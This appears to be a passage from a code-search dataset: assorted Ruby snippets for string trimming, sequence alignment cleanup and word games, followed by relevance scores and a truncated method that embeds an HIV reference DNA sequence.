"def get_the_word\n words = File.readlines(\"5desk.txt\")\n words = words.map do |word|\n word.strip\n end\n words = words.select do |word|\n (word.length > 4) && (word.length < 13)\n end\n words.sample.upcase.split(\"\")\n end",
"def trim(seqses)\n # Avoid truly horrific quadratic behavior. TODO: I think there\n # may be a way to get perfect trimming without going quadratic.\n return seqses.flatten(1) if seqses.size > 100\n\n # Keep the results in a separate array so we can be sure we aren't\n # comparing against an already-trimmed selector. This ensures that two\n # identical selectors don't mutually trim one another.\n result = seqses.dup\n\n # This is n^2 on the sequences, but only comparing between\n # separate sequences should limit the quadratic behavior.\n seqses.each_with_index do |seqs1, i|\n result[i] = seqs1.reject do |seq1|\n # The maximum specificity of the sources that caused [seq1] to be\n # generated. In order for [seq1] to be removed, there must be\n # another selector that's a superselector of it *and* that has\n # specificity greater or equal to this.\n max_spec = _sources(seq1).map do |seq|\n spec = seq.specificity\n spec.is_a?(Range) ? spec.max : spec\n end.max || 0\n\n result.any? do |seqs2|\n next if seqs1.equal?(seqs2)\n # Second Law of Extend: the specificity of a generated selector\n # should never be less than the specificity of the extending\n # selector.\n #\n # See https://github.com/nex3/sass/issues/324.\n seqs2.any? do |seq2|\n spec2 = _specificity(seq2)\n spec2 = spec2.begin if spec2.is_a?(Range)\n spec2 >= max_spec && _superselector?(seq2, seq1)\n end\n end\n end\n end\n result.flatten(1)\n end",
"def no_idle_trim!; end",
"def without_garbage\n reg = Regexp.new /[#{String.characters.join}]+/\n self.scan(reg).join(\"\").gsub(\"\\n\", \" \").gsub(\"|\", \" \").gsub(\"-\", \" \")\n end",
"def strip(tags=TagLib::FLAC::File::AllTags)\n end",
"def erase!(chars)\n return if chars == 0\n str = @result.slice!(-chars..-1)\n newlines = str.count(\"\\n\")\n if newlines > 0\n @line -= newlines\n @offset = @result[@result.rindex(\"\\n\") || 0..-1].size\n else\n @offset -= chars\n end\n end",
"def remove_inserts\n\n currseq = \"\"\n currname = \"\"\n # TODO: extract this from all methods to a helper class \n @content.each do |line|\n # if name anchor is found start a new bin\n if (line =~ /^>(.*)/)\n # check if we found next bin\n if (currseq.length > 0)\n # push name and sequence to containers\n @names << currname\n @seqs << currseq\n end\n # name is found next to anchor\n currname = $1\n # no sequence data yet\n currseq = \"\"\n else\n # append sequence data\n currseq += line\n end \n end \n # collect the data from the last bin\n if (currseq.length > 0)\n @names << currname\n @seqs << currseq\n end\n \n match_cols = []\n \n # Determine which columns have a gap in first sequence (match_cols = false)\n residues = @seqs[0].unpack(\"C*\")\n residues.each_index do |num|\n if (residues[num] == 45 || residues[num] == 46)\n match_cols[num] = false\n else\n match_cols[num] = true\n end\n end\n \n # Delete insert columns\n @names.each_index do |i|\n # Unpack C : 8-bit unsigned integer , push -> Array\n residues = @seqs[i].unpack(\"C*\")\n seq = \"\"\n # traverse over Integer Representation\n residues.each_index do |num|\n # If the base Sequence has no gap then check current sequence \n if (match_cols[num])\n if (residues[num] == 45 || residues[num] == 46)\n # Add gap to Sequence\n seq += \"-\"\n else\n # Add the Residue to Sequence\n seq += residues[num].chr\n end \n end \n end\n # Remove anchoring String Characters\n seq.tr!('^a-zA-Z-','')\n # Push an Upper Case representation to the @seqs array\n @seqs[i] = seq.upcase\n # Check whether all sequences have same length as parent\n if (@seqs[i].length != @seqs[0].length)\n logger.debug \"ERROR! Sequences in alignment do not all have equal length!\"\n end\n end\n end",
"def keep(numbers)\r\nreturn numbers.drop_while { |x| x <= 4 }\r\nend",
"def pick_secret_word\n\t\tFile.read(\"5desk.txt\").lines.select {|word| (4..9).cover?(word.size)}.sample.strip\n\tend",
"def test_tilde_remover\n parser = TancParser.new(\"#{File.dirname(__FILE__)}/../testdata/tanc-1.txt\")\n line_b = \"試験 結果発表~ も 恙無い{つつがなく}~ 終わる{終わって} 当面[01]{当面の} 視点 が 自然[02]{自然と} 夏休み に 集まる{集まって} 来る(くる){くる} でしょう{でしょ}\"\n references_array = line_b.split($delimiters[:tanc_refs_array])\n processed_references_array = []\n references_array.each do |ref|\n data = parser.class.process_reference(ref)\n processed_references_array << data if !data.empty?\n end\n assert_equal(\"結果発表\",processed_references_array[1][:index_word],\"Tilde remover not working\")\n assert_equal(\"恙無い\",processed_references_array[2][:index_word],\"Tilde remover not working\")\n end",
"def pirates_say_arrrrrrrrr(string)\n array_1 = string.downcase.split\"\"\n array_2 = []\n \n loop do\n arrr = array_1.index(\"r\")\n break if arrr == nil\n array_1.delete_at(arrr)\n array_2 << array_1[arrr]\n end\n \narray_2.join\n\nend",
"def spin_words (words)\n list = words.split(\" \")\n final = []\n for item in list do\n if item.chars.length >= 5\n final << item.chars.reverse\n final << \" \"\n else\n final << item\n final << \" \"\n end\n end\n return final.join.strip\nend",
"def black_spot(line)\n parts = line.chomp.split(\"|\")\n\n @names = parts[0].split(\" \")\n @count = parts[1].strip.to_i\n\n until @names.length == 1\n current_index = 0\n until @count == current_index\n @names.each_with_index do |name, index|\n current_index += 1\n if current_index == @count\n @names.delete_at(index)\n break\n end\n end\n end\n end\n\n puts @names[0]\n\nend",
"def slurp_remaining_bird_tracks(lines)\n tracked_lines = []\n\n while lines.first =~ BIRD_TRACKS_REGEX\n tracked_lines << remove_bird_tracks(lines.shift)\n end\n\n if tracked_lines.empty?\n \"\"\n else\n \"\\n\" + tracked_lines.join(\"\\n\")\n end\n end",
"def lex_ignore(length)\n \n return if length.eql?0 #Si no hay nada regresa\n\n word = @input[0..length-1] # Se crea un aux de lo que se quiere ignorar\n lineas = (word + ' ').lines.to_a.length.pred #Se saca el numero de lineas, \n #convirtiendo en arreglo de las palabras separadas \\n y midiendolo\n @line += lineas\n @input = @input[length..@input.length] # Se omite la solicitado\n\n if lineas.eql?0 then\n @column += length #Se suma las columnas omitidas a las que habia\n else\n @column = 1 #Sino se colocan en 1 por salto de linea\n end\n end",
"def find_start(line, len)\n (stream,answer) = line.split(':')\n return if stream.nil?\n stream.chars.each_with_index do |c, i|\n # take slice of array starting at i\n # check if uniq.\n sub = stream[i..i+len-1]\n \n if sub.chars.uniq.length == len\n puts \"sub=#{sub}\" \n puts \"found at index=#{i} chars recv=#{i+len} answer=#{answer}\"\n return\n end\n end \nend",
"def busqueda6\n 9899.step(999999999999999999999,9899){|x|break (x) unless (p x).to_s =~ /[^0-2]/}\nend",
"def sanitize\n\t\t@message.gsub!(/[^a-zA-Z]/, \"\")\n\t\t@message.upcase!\n\n\t\tremainder = @message.length % 5\n\t\tif remainder > 0\n\t\t\t(5 - remainder).times do\t\t\t\t\n\t\t\t\t@message << \"X\"\n\t\t\tend\n\t\tend\n\n\t\t@grouped = @message.scan(/...../)\n\tend",
"def can_construct(ransom_note, magazine)\n ransom_array = ransom_note.split(\"\")\n magazine_array = magazine.split(\"\")\n\n ransom_array.each do |letter|\n if magazine_array.include?(letter) == false\n return false\n else\n magazine_array.delete_at(magazine_array.index(letter))\n end\n end\n true\nend",
"def deletion\n (0...length).map { |i|\n string.dup.tap { |str| str[i] = \"\" }\n }.uniq\n end",
"def stray (n)\n n.count(n[0]) == 1 ? n[0] : n.uniq[1]\nend",
"def right_strip(string)\n whitespaces = [\"\\n\", \"\\t\"]\n i = string.length-1\n i2 = 0\n output = \"\"\n while i>=0\n if string[i] == whitespaces[1] || string[i] == whitespaces[2]\n i-=1 \n else\n while i2<=i\n output += string[i2]\n i2+=1\n end\n return output\n end\n end\n return output\nend",
"def trim(force = T.unsafe(nil)); end",
"def trim(force = T.unsafe(nil)); end",
"def clean2\n content = text.split(\"\\n\")\n \n # First, find and mark songs\n in_song = false\n new_content = []\n content.each do |line|\n if line=~/\\*{5}/ .. line=~END_OF_SONG\n new_content << \"SONG:\" unless in_song\n if line =~ END_OF_SONG\n new_content << line\n in_song = false\n else\n new_content << \" #{line}\"\n in_song = true\n end\n else\n if in_song\n new_content << \"END OF SONG\"\n end\n in_song = false\n new_content << line\n end\n end\n \n # Now, fix line endings and merge lines\n old_content = new_content\n new_content = []\n preserve_breaks = false\n last_line = \"\"\n old_content.each do |line|\n new_content << \"\" if preserve_breaks ||\n last_line =~ END_OF_SONG || \n new_content.size == 0 ||\n line =~ /^.[LS]-\\d+(?:\\]|$|.\\s*\\()/ ||\n line =~ /^\\([A-Z]/ ||\n line =~ /^[A-Z][A-Z, \\.-]+:\\s/ ||\n line =~ /^Scene\\s+\\?\\s+-\\s+\\?/ ||\n line =~ START_OF_SONG ||\n line =~ /^#/\n case line\n when START_OF_SONG\n preserve_breaks = true\n when END_OF_SONG\n preserve_breaks = false\n end\n new_content[-1] += ' ' unless new_content[-1] =~ /^$|\\s$/\n new_content[-1] += line\n last_line = line\n end\n \n # Now, insert extra empty lines\n old_content = new_content\n new_content = []\n extra_space = true\n in_cast = false\n in_song = false\n \n old_content.each do |line|\n if line =~ /^#/\n extra_space = false if in_cast\n else\n in_cast = false\n extra_space = true unless in_song\n end\n new_content << \"\" if extra_space && new_content.size > 0\n new_content << line\n case line\n when /^#CAST FOR SCENE/\n in_cast = true\n when START_OF_SONG\n extra_space = false\n in_song = true\n when END_OF_SONG\n extra_space = true\n in_song = false\n end\n end\n \n # Finally, fix songs\n old_content = new_content\n new_content = []\n i = 0\n while i<old_content.size\n line = old_content[i]\n case line\n when START_OF_SONG\n # Find lines with stars in them\n j = i+1\n while j<old_content.size && old_content[j] !~ END_OF_SONG\n j += 1\n end\n # At this point lines i...j are the song; back up and look for the last \"*****\"\n while j>i && old_content[j] !~ /\\*{5}/\n j -= 1\n end\n # Now lines (i+1)...j are the song information block\n song_information = old_content[(i+1)...j].join\n song_name = song_information[/^[\\s\\*]*([^\\*]+)/,1].strip\n tune = song_information[/([^\\*]+)[\\s\\*]*$/,1].strip\n new_content += [\" SONG: #{song_name}\", \" (To the tune of: #{tune})\"]\n i = j+1\n when END_OF_SONG\n i += 1 # Discard end of song markers; we don't need them anymore\n else\n new_content << line\n i += 1\n end\n end\n \n # Save the results\n text = new_content.join(\"\\n\")\n end",
"def remove_bird_tracks(line)\n tracks = line.scan(BIRD_TRACKS_REGEX)[0]\n (tracks.first == \" \") ? tracks[1] : tracks.join\n end",
"def muscle_sequence(ref_seq = \"\", test_seq = \"\", temp_dir=File.dirname($0))\n temp_file = temp_dir + \"/temp\"\n temp_aln = temp_dir + \"/temp_aln\"\n name = \">test\"\n temp_in = File.open(temp_file,\"w\")\n temp_in.puts \">ref\"\n temp_in.puts ref_seq\n temp_in.puts name\n temp_in.puts test_seq\n temp_in.close\n print `muscle -in #{temp_file} -out #{temp_aln} -quiet`\n aln_seq = fasta_to_hash(temp_aln)[\">test\"]\n File.unlink(temp_file)\n File.unlink(temp_aln)\n return aln_seq\nend",
"def pop(n)\n @buffer.rewind\n @buffer.read(n) || \"\"\n end",
"def get_sandwich(str)\n new_str = \"\"\n (str.size - 4).times do |ingred|\n slice = str[ingred..(ingred + 4)]\n if slice == \"bread\"\n new_str = str[str.index(slice) + 5..str.rindex(slice) - 1]\n end\n end\n return new_str\nend",
"def remove(input, string); end",
"def three_prime_utr_seq\n return self.seq[self.coding_region_cdna_end..-1]\n end",
"def romaji_conditional_slice(string)\n if part_of_speech == \"v5u\" || part_of_speech == \"v5u-s\"\n string.slice!(-1)\n else\n string.slice!(-2..-1)\n end\n end",
"def array_to_unique\n a = File.readline(\"./tmp/database_doings/doing_phrases/phrases_to_sort.txt\")\n b = a.sort\n c = b.uniq\n while d = c.shift\n puts d unless nil?\n end\n end",
"def all_else_dna(dna)\n # Input: A\n # Output: C G T\n # Input: C\n # Output: A G T\n dna_a = [\"A\", \"C\", \"G\", \"T\"]\n # puts dna_a.join(\" \")\n dna_a.delete(dna)\n # puts dna_a.join(\" \")\n return dna_a\n end",
"def read_auto_clean_up=(_arg0); end",
"def writeFinalSequenceFrag()\n outFile = File.new(@seqNameRead1, \"w\")\n\n @read1FileList.each do |file|\n reader = Zlib::GzipReader.open(file)\n while(line = reader.gets)\n line.strip!\n\n if line.match(/^@/)\n @numReadsRead1 = @numReadsRead1 + 1\n\n # Read next 3 lines to complete reading 1 Fastq record\n readString = reader.gets.strip\n qualHeader = reader.gets.strip\n qualString = reader.gets.strip\n\n if line.match(/\\s\\d:N:/)\n @numFilteredRead1 = @numFilteredRead1 + 1\n writeFastqRecordToFile(outFile, line, readString, qualHeader,\n qualString)\n end\n end\n end\n reader.close\n end\n outFile.close\n end"
] |
[
"0.5708526",
"0.5702116",
"0.5659281",
"0.5645462",
"0.55234194",
"0.5460344",
"0.5375854",
"0.5361511",
"0.5352391",
"0.53510356",
"0.5338272",
"0.532415",
"0.5315767",
"0.52379984",
"0.5136319",
"0.51339257",
"0.5115226",
"0.5104202",
"0.5103664",
"0.50995904",
"0.5087479",
"0.50766516",
"0.50706214",
"0.50700915",
"0.5055571",
"0.5036293",
"0.50079364",
"0.4988541",
"0.49761784",
"0.4964564",
"0.49607977",
"0.49570033",
"0.49508336",
"0.49451256",
"0.49390727",
"0.4935523",
"0.49324852",
"0.49286935",
"0.49255425",
"0.49176657",
"0.49153042",
"0.49104527",
"0.49087095",
"0.49023977",
"0.48929822",
"0.4886947",
"0.4877518",
"0.48751876",
"0.48679775",
"0.4865893",
"0.48624623",
"0.48593727",
"0.48550287",
"0.4849572",
"0.48464456",
"0.4832795",
"0.48317087",
"0.48282102",
"0.48178962",
"0.4803738",
"0.4799703",
"0.4799689",
"0.47937766",
"0.47912234",
"0.47890761",
"0.47881",
"0.47622025",
"0.47587544",
"0.47561926",
"0.47549495",
"0.47524852",
"0.4749596",
"0.474944",
"0.47406498",
"0.4737675",
"0.47343436",
"0.47325084",
"0.47313955",
"0.47268695",
"0.47240308",
"0.47204497",
"0.47124556",
"0.47082633",
"0.47023928",
"0.46808374",
"0.4680809",
"0.4677541",
"0.4677541",
"0.46772552",
"0.46756813",
"0.4674242",
"0.46684307",
"0.4665104",
"0.46646854",
"0.46642634",
"0.46594638",
"0.46557322",
"0.46554413",
"0.4649268",
"0.46486166"
] |
0.54237974
|
6
|
Precomputes index if it does not exist. ref: path to reference. ref_base: path to reference without file extension. software: alignment software (bowtie1, bowtie2, bwa, star). annotation: path to GTF annotation (only star). Returns nothing.
|
def index(ref, ref_base, software, annotation = '')
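  # Suffix whose presence marks an already-built index, per aligner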
index_suffix = {
bowtie1: '4.ebwt',
bowtie2: '4.bt2',
bwa: '.sa',
star: '.star'
}
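  # Shell command that builds the index for each supported aligner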
index_cmd = {
bowtie1: "bowtie-build -p #{ref} #{ref_base}",
bowtie2: "bowtie2-build -p #{ref} #{ref_base}",
bwa: "bwa index #{ref}",
star: "mkdir #{ref_base} && "\
'STAR --runMode genomeGenerate' \
' --runThreadN $(nproc)' \
" --genomeDir #{ref_base}"\
" --genomeFastaFiles #{ref}"\
' --sjdbOverhang 49' \
" --sjdbGTFfile #{annotation} "
}
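  # If another run holds the lock, wait with a 5x backoff between checks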
time = 5
while File.exist?("#{ref_base}.lock")
print_e "#{ref_base}.lock exists. Wait for #{time} seconds."
sleep(time)
time *= 5
end
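  # No index is built for tophat; otherwise skip if the index already exists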
return if software == :tophat ||
skip_step?("#{ref_base}.#{index_suffix[software]}", 'indexing')
begin
run_cmd("touch #{ref_base}.lock")
run_cmd(index_cmd[software])
ensure
run_cmd("rm -f #{ref_base}.lock")
end
end
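# A minimal usage sketch (hypothetical paths; assumes this method is mixed into a
# pipeline object that provides print_e, run_cmd, and skip_step?):
#
#   index('ref/genome.fa', 'ref/genome', :bowtie2)
#   index('ref/genome.fa', 'ref/genome_star', :star, 'ref/genes.gtf')
#
# Only the :star command consults the annotation argument.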
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def compute\n index(@ref, @ref_base, @software, @annotation)\n\n if @err_rate > 0\n bucketized_alignment\n else # software == :star || err_rate == 0\n unbucketized_alignment\n end\n end",
"def initialize(annot)\n @annot = annot\n @id2name = {}\n @index = \"#{@annot}.name_index\"\n if File.exist?(@index)\n read_index\n else\n build_index\n end\n end",
"def map_tgup_by_proteinid()\n # output unmatch list for map by gene_id (prefix of gene_id is first char of gene_id. (\"1\", \"2\", ..))\n refg_output = {}\n FileUtils.mkdir_p(\"#{$prepare_dir}/refg\") unless File.exist?(\"#{$prepare_dir}/refg\")\n (1..9).each do |prefix|\n refg_output[prefix.to_s] = File.open(\"#{$prepare_dir}/refg/#{prefix.to_s}.dat\", \"w\")\n end\n\n output_header\n\n # try mapping the same prefix of RefSeq data and UniProt data(for performance)\n Dir.glob(\"#{$prepare_dir}/refp/*.dat\") do |input_file|\n # parse data\n refseq_gene_list = []\n protein_id_prefix = input_file.split(\"/\").last.split(\"\\.\").first\n puts \"protein_id prefix: #{protein_id_prefix}\"\n File.open(input_file) do |f|\n f.each_line do |line|\n columns = line.chomp.strip.split(\"\\t\")\n gene_id_prefix = columns[4].nil? ? \"\" : columns[4][0]\n refseq_gene_list.push({taxid: columns[0], gene_rsrc: columns[1], gene_label: columns[2], protein_id: columns[3], gene_id: columns[4], gene_id_prefix: gene_id_prefix})\n end\n end\n\n $count_nc += refseq_gene_list.size if protein_id_prefix == \"no_protein_id\" # no protein_id on RefSeq\n up_list = load_up_refp(protein_id_prefix) # get same prefix data from UniProt\n\n refseq_gene_list.each do |refseq_data|\n match = false\n output_tax(refseq_data) # output all gene-tax turtle\n unless up_list.nil? # exist prefix on UniProt\n match_list = up_list[refseq_data[:protein_id]]\n unless match_list.nil? # match some uniprot_ids\n match_list.each do |up_info|\n if refseq_data[:taxid] == up_info[:taxid] # ignore unmatch tax\n output_idmap(refseq_data, up_info[:upid])\n match = true\n else # match protein_id but not match tax_id\n output_uptax(up_info)\n $taxup_list[up_info[:taxid]] = true\n $tax_mismatch[\"#{refseq_data[:taxid]}-#{up_info[:taxid]} : #{refseq_data[:protein_id]}\"] = true\n end\n end\n end\n end\n if match == false\n if refseq_data[:gene_id_prefix].nil? ||refseq_data[:gene_id_prefix] == \"\" # can't salvage it by gene_id.\n $no_up += 1\n else # output a file to each prefix of gene_id that can be salvaged by gene_id\n line = [refseq_data[:taxid], refseq_data[:gene_rsrc], refseq_data[:gene_label], refseq_data[:protein_id], refseq_data[:gene_id], refseq_data[:gene_id_prefix]]\n refg_output[refseq_data[:gene_id_prefix]].puts(line.join(\"\\t\"))\n end\n end\n $count += 1\n end\n end\n refg_output.each do |k, v|\n v.flush\n v.close\n end\nend",
"def initialize(matching_index, pointer)\n # Matching files with other indexes than CRC\n # map< ( file_info | segment_info ), matching_pointer_info >\n # map< ( FileInfo | SegmentInfo ), MatchingIndexSinglePointer >\n @matching_files = {}\n @crc_matching_files = {}\n @score_max = compute_score_max(pointer)\n # First find CRC matching files\n if (matching_index.indexes.has_key?(:crc))\n matching_index.indexes[:crc].each do |data, lst_pointers|\n @crc_matching_files.concat(lst_pointers)\n end\n end\n # Then all other indexes\n matching_index.indexes.each do |index_name, index_data|\n if (index_name != :crc)\n index_data.each do |data, lst_pointers|\n lst_pointers.each do |matching_pointer|\n if (!@crc_matching_files.has_key?(matching_pointer))\n @matching_files[matching_pointer] = MatchingIndexSinglePointer.new if (!@matching_files.has_key?(matching_pointer))\n @matching_files[matching_pointer].score += COEFFS[index_name]\n @matching_files[matching_pointer].indexes[index_name] = [] if (!@matching_files[matching_pointer].indexes.has_key?(index_name))\n @matching_files[matching_pointer].indexes[index_name] << data\n end\n end\n end\n end\n end\n matching_index.segments_metadata.each do |segment_ext, segment_ext_data|\n segment_ext_data.each do |metadata_key, metadata_data|\n metadata_data.each do |metadata_value, lst_pointers|\n lst_pointers.each do |matching_pointer|\n if (!@crc_matching_files.has_key?(matching_pointer))\n @matching_files[matching_pointer] = MatchingIndexSinglePointer.new if (!@matching_files.has_key?(matching_pointer))\n @matching_files[matching_pointer].score += COEFF_SEGMENT_METADATA\n @matching_files[matching_pointer].segments_metadata[segment_ext] = {} if (!@matching_files[matching_pointer].segments_metadata.has_key?(segment_ext))\n @matching_files[matching_pointer].segments_metadata[segment_ext][metadata_key] = [] if (!@matching_files[matching_pointer].segments_metadata[segment_ext].has_key?(metadata_key))\n @matching_files[matching_pointer].segments_metadata[segment_ext][metadata_key] << metadata_value\n end\n end\n end\n end\n end\n # Find matching blocks' CRC sequences\n lst_crc = (pointer.is_a?(FileInfo) ? pointer.crc_list : pointer.segment.crc_list)\n @matching_files.each do |matching_pointer, matching_info|\n if (matching_info.indexes.has_key?(:block_crc))\n lst_common_crc = matching_info.indexes[:block_crc]\n # Get the list of blocks' CRC from the file\n lst_matching_crc = (matching_pointer.is_a?(FileInfo) ? 
matching_pointer.crc_list : matching_pointer.segment.crc_list)\n # Parse the original file and get to a matching CRC\n idx_crc = 0\n while (idx_crc < lst_crc.size)\n while ((idx_crc < lst_crc.size) and\n (!lst_common_crc.include?(lst_crc[idx_crc])))\n idx_crc += 1\n end\n if (idx_crc < lst_crc.size)\n first_crc = lst_crc[idx_crc]\n # We are at the beginning of a sequence in the original file.\n smallest_sequence_size = lst_crc.size - idx_crc\n # Find all the occurences of this sequence in the matching file.\n lst_matching_crc.each_with_index do |matching_crc, idx_matching_crc|\n if (matching_crc == first_crc)\n # We are at the beginning of a sequence in the matching file\n idx_sequence = 1\n # Get the matching sequence\n matching_sequence = [first_crc]\n while ((idx_crc+idx_sequence < lst_crc.size) and\n (idx_matching_crc+idx_sequence < lst_matching_crc.size) and\n (lst_crc[idx_crc+idx_sequence] == lst_matching_crc[idx_matching_crc+idx_sequence]))\n matching_sequence << lst_crc[idx_crc+idx_sequence]\n idx_sequence += 1\n end\n if (matching_sequence.size > 1)\n # There is a matching sequence\n offset = idx_crc*FileInfo::CRC_BLOCK_SIZE\n matching_info.block_crc_sequences[offset] = {} if (!matching_info.block_crc_sequences.has_key?(offset))\n matching_info.block_crc_sequences[offset][idx_matching_crc*FileInfo::CRC_BLOCK_SIZE] = matching_sequence\n smallest_sequence_size = matching_sequence.size if (matching_sequence.size < smallest_sequence_size)\n # For each successful sequence, increase the score\n matching_info.score += (COEFF_BLOCK_CRC_SEQUENCE * matching_sequence.size)\n end\n end\n end\n idx_crc += smallest_sequence_size\n end\n end\n end\n end\n end",
"def idx_log_file\n\t\t\"#{pre}/genome_idx/log\" #Bowtie2 Index Log\n\tend",
"def croucher_index_file\n nil\n end",
"def require_reference(path); end",
"def fa_file\n\t\t\"#{pre}/genome.fa\" #Genome fasta location\n\tend",
"def bam_index_load(fn)\n hts_idx_load(fn, HTS_FMT_BAI)\n end",
"def require_index(name); end",
"def require_index(name); end",
"def get_index_from_gh # rubocop:disable Metrics/MethodLength, Metrics/AbcSize\n resp = Zip::InputStream.new URI(\"#{Hit::GHURL}index.zip\").open\n zip = resp.get_next_entry\n yaml = zip.get_input_stream.read\n index = RelatonBib.parse_yaml yaml, [Symbol]\n File.write path, index.to_yaml, encoding: \"UTF-8\"\n index\n end",
"def index(options = {})\n system(\"gem generate_index -d #{@path} > /dev/null\")\n # options = {:build_legacy => true, :build_modern => true}.merge(options)\n # indexer = indexer(options)\n # options[:update] ? indexer.update_index : indexer.generate_index\n end",
"def map_tgup_by_geneid()\n Dir.glob(\"#{$prepare_dir}/refg/*.dat\") do |input_file|\n refseq_gene_list = []\n gene_id_prefix = input_file.split(\"/\").last.split(\"\\.\").first\n puts \"gene_id prefix: #{gene_id_prefix}\"\n File.open(input_file) do |f|\n f.each_line do |line|\n columns = line.chomp.strip.split(\"\\t\")\n refseq_gene_list.push({taxid: columns[0], gene_rsrc: columns[1], gene_label: columns[2], protein_id: columns[3], gene_id: columns[4], gene_id_prefix: gene_id_prefix})\n end\n end\n\n up_list = load_up_refg(gene_id_prefix) # get same prefix data from UniProt\n refseq_gene_list.each do |refseq_data|\n match = false\n unless up_list.nil? # exist prefix list on UniProt\n match_list = up_list[refseq_data[:gene_id]]\n unless match_list.nil?\n match_list.each do |up_info|\n if refseq_data[:taxid] == up_info[:taxid]\n output_idmap(refseq_data, up_info[:upid])\n match = true\n end\n end\n end\n end\n if match == false\n $no_up += 1\n end\n end\n end\nend",
"def make_augmenting_path!()\n # Construct alternating paths\n complete = false\n count = 0\n \n while !complete\n row = @annotated_matrix.find_in_col(@image[count], STARRED).first\n \n if row\n count += 1\n @preimage[count] = row\n @image[count] = @image[count-1]\n else\n complete = true\n end\n\n if !complete\n col = @annotated_matrix.find_in_row(@preimage[count], PRIMED).first\n count += 1\n @preimage[count] = @preimage[count-1]\n @image[count] = col\n end\n end\n\n # Modify the paths\n (count+1).times {|i|\n row = @preimage[i]\n col = @image[i]\n \n if starred?(row, col)\n unstar!(row, col)\n else\n star!(row, col)\n end\n }\n clear_covers!()\n clear_primes!()\n return 3\n end",
"def masterfile_keys\n ['gtin', 'tranno']\n end",
"def NL43_locator(seq=\"\",temp_dir=File.dirname($0))\n hxb2_ref = \"TGGAAGGGCTAATTTGGTCCCAAAAAAGACAAGAGATCCTTGATCTGTGGATCTACCACACACAAGGCTACTTCCCTGATTGGCAGAACTACACACCAGGGCCAGGGATCAGATATCCACTGACCTTTGGATGGTGCTTCAAGTTAGTACCAGTTGAACCAGAGCAAGTAGAAGAGGCCAAATAAGGAGAGAAGAACAGCTTGTTACACCCTATGAGCCAGCATGGGATGGAGGACCCGGAGGGAGAAGTATTAGTGTGGAAGTTTGACAGCCTCCTAGCATTTCGTCACATGGCCCGAGAGCTGCATCCGGAGTACTACAAAGACTGCTGACATCGAGCTTTCTACAAGGGACTTTCCGCTGGGGACTTTCCAGGGAGGTGTGGCCTGGGCGGGACTGGGGAGTGGCGAGCCCTCAGATGCTACATATAAGCAGCTGCTTTTTGCCTGTACTGGGTCTCTCTGGTTAGACCAGATCTGAGCCTGGGAGCTCTCTGGCTAACTAGGGAACCCACTGCTTAAGCCTCAATAAAGCTTGCCTTGAGTGCTCAAAGTAGTGTGTGCCCGTCTGTTGTGTGACTCTGGTAACTAGAGATCCCTCAGACCCTTTTAGTCAGTGTGGAAAATCTCTAGCAGTGGCGCCCGAACAGGGACTTGAAAGCGAAAGTAAAGCCAGAGGAGATCTCTCGACGCAGGACTCGGCTTGCTGAAGCGCGCACGGCAAGAGGCGAGGGGCGGCGACTGGTGAGTACGCCAAAAATTTTGACTAGCGGAGGCTAGAAGGAGAGAGATGGGTGCGAGAGCGTCGGTATTAAGCGGGGGAGAATTAGATAAATGGGAAAAAATTCGGTTAAGGCCAGGGGGAAAGAAACAATATAAACTAAAACATATAGTATGGGCAAGCAGGGAGCTAGAACGATTCGCAGTTAATCCTGGCCTTTTAGAGACATCAGAAGGCTGTAGACAAATACTGGGACAGCTACAACCATCCCTTCAGACAGGATCAGAAGAACTTAGATCATTATATAATACAATAGCAGTCCTCTATTGTGTGCATCAAAGGATAGATGTAAAAGACACCAAGGAAGCCTTAGATAAGATAGAGGAAGAGCAAAACAAAAGTAAGAAAAAGGCACAGCAAGCAGCAGCTGACACAGGAAACAACAGCCAGGTCAGCCAAAATTACCCTATAGTGCAGAACCTCCAGGGGCAAATGGTACATCAGGCCATATCACCTAGAACTTTAAATGCATGGGTAAAAGTAGTAGAAGAGAAGGCTTTCAGCCCAGAAGTAATACCCATGTTTTCAGCATTATCAGAAGGAGCCACCCCACAAGATTTAAATACCATGCTAAACACAGTGGGGGGACATCAAGCAGCCATGCAAATGTTAAAAGAGACCATCAATGAGGAAGCTGCAGAATGGGATAGATTGCATCCAGTGCATGCAGGGCCTATTGCACCAGGCCAGATGAGAGAACCAAGGGGAAGTGACATAGCAGGAACTACTAGTACCCTTCAGGAACAAATAGGATGGATGACACATAATCCACCTATCCCAGTAGGAGAAATCTATAAAAGATGGATAATCCTGGGATTAAATAAAATAGTAAGAATGTATAGCCCTACCAGCATTCTGGACATAAGACAAGGACCAAAGGAACCCTTTAGAGACTATGTAGACCGATTCTATAAAACTCTAAGAGCCGAGCAAGCTTCACAAGAGGTAAAAAATTGGATGACAGAAACCTTGTTGGTCCAAAATGCGAACCCAGATTGTAAGACTATTTTAAAAGCATTGGGACCAGGAGCGACACTAGAAGAAATGATGACAGCATGTCAGGGAGTGGGGGGACCCGGCCATAAAGCAAGAGTTTTGGCTGAAGCAATGAGCCAAGTAACAAATCCAGCTACCATAATGATACAGAAAGGCAATTTTAGGAACCAAAGAAAGACTGTTAAGTGTTTCAATTGTGGCAAAGAAGGGCACATAGCCAAAAATTGCAGGGCCCCTAGGAAAAAGGGCTGTTGGAAATGTGGAAAGGAAGGACACCAAATGAAAGATTGTACTGAGAGACAGGCTAATTTTTTAGGGAAGATCTGGCCTTCCCACAAGGGAAGGCCAGGGAATTTTCTTCAGAGCAGACCAGAGCCAACAGCCCCACCAGAAGAGAGCTTCAGGTTTGGGGAAGAGACAACAACTCCCTCTCAGAAGCAGGAGCCGATAGACAAGGAACTGTATCCTTTAGCTTCCCTCAGATCACTCTTTGGCAGCGACCCCTCGTCACAATAAAGATAGGGGGGCAATTAAAGGAAGCTCTATTAGATACAGGAGCAGATGATACAGTATTAGAAGAAATGAATTTGCCAGGAAGATGGAAACCAAAAATGATAGGGGGAATTGGAGGTTTTATCAAAGTAAGACAGTATGATCAGATACTCATAGAAATCTGCGGACATAAAGCTATAGGTACAGTATTAGTAGGACCTACACCTGTCAACATAATTGGAAGAAATCTGTTGACTCAGATTGGCTGCACTTTAAATTTTCCCATTAGTCCTATTGAGACTGTACCAGTAAAATTAAAGCCAGGAATGGATGGCCCAAAAGTTAAACAATGGCCATTGACAGAAGAAAAAATAAAAGCATTAGTAGAAATTTGTACAGAAATGGAAAAGGAAGGAAAAATTTCAAAAATTGGGCCTGAAAATCCATACAATACTCCAGTATTTGCCATAAAGAAAAAAGACAGTACTAAATGGAGAAAATTAGTAGATTTCAGAGAACTTAATAAGAGAACTCAAGATTTCTGGGAAGTTCAATTAGGAATACCACATCCTGCAGGGTTAAAACAGAAAAAATCAGTAACAGTACTG